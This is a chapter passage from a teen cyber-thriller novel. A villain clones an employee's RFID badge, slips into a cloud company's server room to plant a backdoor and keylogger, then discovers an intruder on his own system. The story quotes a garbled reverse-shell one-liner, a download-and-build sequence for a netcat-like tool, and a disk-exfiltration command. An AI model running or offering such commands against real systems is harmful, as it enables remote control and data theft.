War With Black Iris (Cyber Teen Project Book 2) Read online

Page 9


  “What is your name?”

  “My name is Anton Bond,” Gregor said.

  “Welcome to the United States, Mr. Bond.” The agent handed “Anton’s” passport back.

  “Thank you, and happy holidays,” Gregor said.

  Gregor stepped out into the cold night air and turned on his phone. A message awaited on his secure app: Van waiting in car park behind customs building. The message was signed “JM.”

  Gregor walked to the appointed place. The van he saw there was several years old, but in good shape. He got into the driver’s seat. Not wanting to draw any attention, Gregor drove the van to a motel to complete his preparations.

  After a quick check of various local online classified boards specializing in modified radio scanner equipment, he decided on an older—but more reliable—Radio-frequency identification (RFID) cloner. The older models could be modified to get a better signal range. He spotted the perfect cloner to suit his needs. The ad read: Looking to clone some Radio IDs? Then you have come to the right place, friend. Call crazy Lenny for a good deal, 555-1246. Cash only, and no fuzz!

  That looks promising, Gregor thought as he dialed the number.

  “Hey, you looking for Lenny?” a man answered.

  “Yes. Do you have the Mark H4 model?” Gregor asked.

  “Sure we do. Meet at Fourth and Mills in Newport in one hour.” The line severed.

  Gregor looked at the Maps app. It was at least a thirty-minute drive.

  Due to slippery roads, there was unexpected traffic, but Gregor got there five minutes before the meeting time. He examined the corner as he drove past. He parked the van a few blocks away on a side street, and then got out and waited at the corner. He noticed that they had chosen an exposed meeting spot.

  I’m being watched.

  Less than a minute later, a weasel of a man emerged from the safety of the shadows between two buildings.

  “You asked for the Mark H4. You bring the cash?” the man asked.

  Gregor took out a wad of hundred-dollar bills and gave the man five of them. He was handed a plastic bag printed with a dancing donut. He inventoried the equipment, and the man was gone before Gregor looked up.

  Gregor spent the rest of the evening making modifications to the scanner module.

  The next morning, Gregor parked his van within sight of the back employee entrance of a local CloudShield office.

  I need to be within forty feet of the badge, Gregor reminded himself. He positioned himself to work from the back of his van.

  Foot traffic seems low, probably because of the holidays.

  The antenna booster was tucked out of sight. After what seemed like hours, two men started making their way to the back employee entrance. Gregor positioned himself.

  Need the right moment.

  One employee held up his RFID proximity card for access, and Gregor started the scanner; his computer was picking up some activity. Gregor knew from experience that it took about twenty seconds to clone a badge. This is taking too long, Gregor thought. A loud beep emanated from his computer. A message appeared, saying, ERROR: incomplete data read.

  “Damn!” Gregor spat.

  Gregor wasted no time resetting the scanner. The second employee hadn’t badged in; he was on his phone, and from the looks of it, the call was personal. Gregor rolled down one of the van’s windows so he could make out bits and pieces of the conversation. It sounded like the employee was having financial trouble.

  Perfect! Gregor thought. He needed to identify the employee just in case the badge reader couldn’t pick up on his scan. He took out his camera, which was ideal for taking reconnaissance photos because the body was small and equipped with a telephoto lens. After taking several photos of the employee, he put the camera away. His mark was now making a move toward the door.

  After checking the scanner receiving program on his laptop and scanner equipment, he was ready to clone any employee’s access card. Gregor looked up. The employee was now at the scanner! Gregor set the program for auto-scanning, and the computer started emitting various tones. These sound promising. He checked the computer, and a valid system message appeared. Gregor made a clone of the badge, pulled up a list of badge-reader data that he’d infiltrated from the company earlier, matched the badge identification number with his list, and then found an identity: Stephen Fishmann, operations manager. Hmm. Gregor couldn’t be sure, but Mr. Fishmann might have access to the server room. It was time for a quick test to find out. He waited for the back entrance to be clear of smokers; it was too cold for people to be hanging out outside without a purpose.

  Let’s see if this works.

  He put the cloned RFID proximity card in the pouch just behind a fake mockup of a CloudShield badge, which matched the CloudShield uniform he’d purchased from the supply shop down the street. Gregor marveled at how weak physical security was at some companies; people were too trusting. All he needed was a fake offer letter, which he’d found on social media from an enthusiastic new hire who’d posted theirs online. It was now deleted, but Gregor could recover it; it was impossible to delete anything once it was posted online. He stepped up to the reader, swiped the card, and a light on the reader blinked both red and green, but the door didn’t budge. After waiting several seconds, he took the card out of the pouch and waved it in front of the reader. He heard a loud clicking noise, and this time a green light appeared on the reader.

  Nice! Gregor opened the door and walked through.

  The door led to an empty reception desk. Several boxes addressed to various people in the building were piling up. No one else was in sight. The server room should be in the center of the building, or in the subbasement, he thought. It was not referenced on the plans he’d acquired from the county, but his first guess was the center area on the first floor, away from the break room. As he made his way down the hall, two people nodded and said hello, but no one questioned his authority. After several more minutes of searching, Gregor was about to give up and look in the subbasement when he heard the distant sound of fans whirring. I’d know that sound anywhere, Gregor thought.

  He followed the fan noise until he got to a set of double metal doors. One of them was propped open, so he walked in. No one was in sight; however, he noticed a cardboard box with a laptop on it. No one had bothered to lock the screen. My kind of company! A few seconds later, he had verified root credentials. This was too easy! Five minutes later, he had accomplished his task, his backdoor was installed, and as a bonus, he’d installed a keystroke-logging malware that would send a daily digest of all keyboard activity. Gregor turned to leave the facility, but froze as he heard someone enter the room from the other side. He snatched a peek through a gap in one of the server racks. A man dressed in blue jeans and a stained shirt entered holding a fast food bag. The man tripped over a box and almost lost his lunch.

  Why would a world-class cloud protection company hire such a bumbler? It worked well for me! Gregor thought.

  Gregor exited the room before the man made his way around the server racks. He didn’t see anyone else as he left the facility.

  Gregor slept for short intervals on the plane. According to his smartwatch, he’d slept thirty minutes during the eight-hour flight. The CloudShield infiltration had taken more out of him than he cared to admit.

  Gregor’s phone chirped. It was Jeremiah. Need operational status, the message read.

  I guess sleep will have to wait, Gregor thought.

  Gregor checked his covert channels. His associate hadn’t checked in for a while now, and he had to be certain that Black Iris was not planning a counterattack. Gregor read over the last message received.

  Comrade,

  If you are reading this, then either I have failed and am lying in a ditch somewhere, or I’m stuck in a pub.

  Thanks for choosing me, and if I did pass out in a pub for more than twenty-four hours, prompting this automatic delivery, I give you permission to finish me off. Either way, I’m a dead man.

&
nbsp; Best regards,

  Allan

  Farewell, my friend, Gregor thought.

  Forty minutes later, Gregor entered Jeremiah’s operations center: an area about the size of a large living room. Several workbenches with monitors and keyboards were set up around the entire room. Jeremiah was sitting at his workstation, which was a circular desk with monitors surrounding most of the desk. The monitors were angled so anyone sitting at the desk could see the entire room without getting up.

  “What news?” Jeremiah asked.

  “After checking my dashboard, the distributed denial of service attacks (DDOS) have been successful and are still ongoing. CloudShield hasn’t taken them down yet,” Gregor said.

  “What about confirmation of Black Heart’s demise?”

  “Negative. My operative traced her movements to a car park several blocks from the Design Center. Since he has yet to report back, I can only assume that he failed.”

  “And the Collective?” Jeremiah asked.

  “I’ve heard nothing from them, and there’s no chatter on the online forums, either. It seems they have gone to ground.”

  “I want you to focus on infiltrating Pretzelverse Games’ Munich headquarters. I need intel on the cloning labs,” Jeremiah said.

  “But how should I prioritize this? I’m already shorthanded,” Gregor said.

  “I’m working on getting you more resources. In the interim, keep pressure on Black Iris; that is our top priority, but consider the cloning labs task a close second.”

  “Affirmative,” Gregor said.

  Gregor heard a familiar ping on his system. He looked at his bash history and noticed something troubling. While he’d been busy infiltrating CloudShield, someone had been running several PSnake commands in the background. A company called Alfie Bytes had created PSnake, which allowed anyone to run custom programs in order to automate certain functions of the Ninex operating system. In theory, it saved all commands run on Gregor’s system into a special history file called “bash history.” Gregor’s heart sank when he looked at his system’s bash history.

  Ohh, this is not good! Gregor thought.

  As a precaution, Gregor was in the habit of recording all of his keystrokes into a special hidden file that only he had access to. He ran one of his custom programs that would compare his actions against the bash history logs; the idea was to find potential intruder activity. The following command worried Gregor:

  PSnake -c ‘import socket, subprocess=os, socket=INET, SOCK_STREAM; s.connect((“10.0.0.254”));os.dup(s.fileno(),0); p=subprocess.call([“/bin/sh”,”-i”]);’

  The user running this code knew what they were doing, Gregor thought.

  The command opened a special connection known as a reverse shell, which allowed anyone to command his system. Gregor ran a series of commands that checked his system updater profile. He noticed that several packages were not at the most current revision level. He updated the updater software, and then downloaded the updates. After a quick restart, he double-checked all versions of code on his system.

  “They are not getting back on my system!” Gregor said.

  Gregor then double-checked his installer logs. There was another entry he hadn’t expected, and it worried him more than he wanted to admit.

  “No. . . not the kitty!

  “Who is not getting back on? What is ‘the kitty?’ What are you talking about, Gregor?” Jeremiah said from behind him.

  Damn—I didn’t hear him come in, Gregor thought. Sneaky bastard.

  “I was just talking to myself,” Gregor said.

  “Are we compromised?” Jeremiah asked.

  “No—there were some people knocking on our front door is all.”

  Jeremiah gave Gregor a wary look, but then he left, saying nothing else.

  Gregor needed to know when the intruder had been on his system. The discovery of the kitty was unnerving. He pulled up another terminal window and added the HISTORY-TIME-FORMAT variable, which allowed him to see when each command was run. Further analysis revealed the following commands:

  2-27 14:11:45 Sudo apt install netmap

  12-27 14:14:23 wget http://installforge.net/projects/netkitty/files/0.1.0/netkitty-0.1.0.tar.gz

  12-27 14:20:16 tar -xzvf netkitty-0.1.0.tar.gz

  12:27 14:21:01 ./configure

  12-27 14:33:11 sudo make

  This was not good at all. Gregor just proved that an attacker had installed the netkitty program that would that all his movements, which was devastating to Gregor’s plans. He scanned the history logs for more signs of malicious behavior. He was about to give up when he noticed something strange; there was a gap in all system logging activity during a thirty-minute window. He checked the logs before and after the anomaly and noticed that they were stitched together.

  Part of the log is missing!

  It took a while, but Gregor was able to undelete the missing log fragment. He used a file search utility to look for specific netkitty patterns. What he found chilled his blood. Gregor analyzed all netkitty commands run on the system. The command “nk -lp 2424 | sudo dd of=/_secret/home/remote_exfil.img.gz” was proof that someone had duplicated his entire hard drive.

  I’m in serious trouble, Gregor thought.

  Chapter 8

  Raphie opened the door to Nigel’s room.

  “Do you know where Mom is?” Ralphie asked Nigel.

  Not yet. Everyone is looking, Nigel texted to Ralphie’s phone.

  Nigel hoped that his brother wouldn’t get upset; sometimes Ralphie would get scared and need comforting, and Nigel wasn’t ready for that.

  “Okay, it’s probably the weather. I heard on the police band that there is a huge pileup on the interstate, just before Evens Road,” Ralphie said.

  Since when did you start listening to the police band? Nigel texted.

  “I heard you and Milo talking about it before,” Ralphie said.

  She must be the behind that. Cell phone coverage is a bit spotty there. I’m sure she’s okay. Nigel gave Ralphie a reassuring smile as he texted.

  “I’m hungry,” Ralphie said abruptly.

  Food sounds good, Nigel texted.

  “I will make us some dinner, Nige. Let’s see what frozen wonders chef Ralphie can whip up!” Ralphie said as he headed toward the kitchen.

  Mom will be fine. I need to stay focused, Nigel thought.

  Nigel resumed his work. He needed a way to measure activity from various parts of the internet so he could get an accurate idea of what the BGP router malware was doing; the problem was that he didn’t have the access to do such a thing. Or did he?

  He launched his ShowALLD web app protected by an anonymous MORP browser connection. The purpose of the ShowALLD app was to provide intelligence on vulnerable systems that were on the internet. He had to determine the bot’s next move. It seemed to be going after a certain vulnerable version of the BGP router. The malware would attack it and then use it to disseminate the next phase of attacks. He needed Jet’s research to put all of this together.

  Where is she?

  Dane zipped his winter coat up to his neck and put his gloved hands in his pockets. He looped the shopping bag that Mrs. Watson had left in her haste around his wrist.

  At least I will be able to show the voice modulator to Nigel, Dane thought.

  Dane knocked on the door to the Watson house. The sun was setting, and the snowman near the front porch had seen better days. It was half melted, and its features were fading.

  Are they home?

  A boy of about ten answered the door.

  “You must be Ralphie,” Dane said.

  “Who are you?”

  “I’m Dane, Mr. Henry’s son. Is your mom home?”

  “She’s missing!”

  Dane felt like his heart was stuck in his throat. He tried to speak but couldn’t.

  “Nige!” Ralphie called. “Come here, please.”

  A few minutes later, Nigel Watson gave a wave, and then pointed to his throat. Nigel gestured
for Dane to come inside.

  “Your mother is missing?” Dane asked.

  Nigel started texting. Seconds later, Dane received a text.

  She went to your father’s store to get me a power adapter. She was due back hours ago.

  “She forgot her purchases,” Dane said as he handed the shopping back to Nigel.

  Nigel grabbed the power adapter, and his expression changed from grim silence to joyful glee. However, it was short-lived.

  “Road conditions are bad, Nige,” Dane said, “Traffic was much worse than I expected. I was planning on seeing my girlfriend tonight, but even that will need to wait.”

  Nigel took out the voice modulator with a puzzled look.

  “It’s something I’ve been working on,” Dane continued. “I designed it to help people with damaged vocal cords.”

  Nigel examined the device attached to a leather strap. He put it on, and then went to the bathroom to see how it looked.

  “Try to speak,” Dane said.

  “Hi, D’anz” Nigel said in a mechanical voice.

  “Needs some adjustments, I see,” Dane said.

  “Oh’tayz,” Nigel said.

  “Let me adjust it, Nige,” Dane said.

  Dane ran back to the car. A surprising amount of snow was already accumulating. He returned with a toolkit. He made several adjustments, and then handed the device back to Nigel.

  “How is it?”

  “As . . . good as new—my voice!” Nigel said as he smiled.

  “Good, because we need to find your mother.”

  After several hours of searching, Natasha found Ellen at Mercy General Hospital, about ten miles south of Milford. By the time Natasha found her, it was well after dark. Natasha looked at her phone and noticed several missed texts from Nigel.

  Don’t want to text him back with nothing. Need more information first, Natasha thought.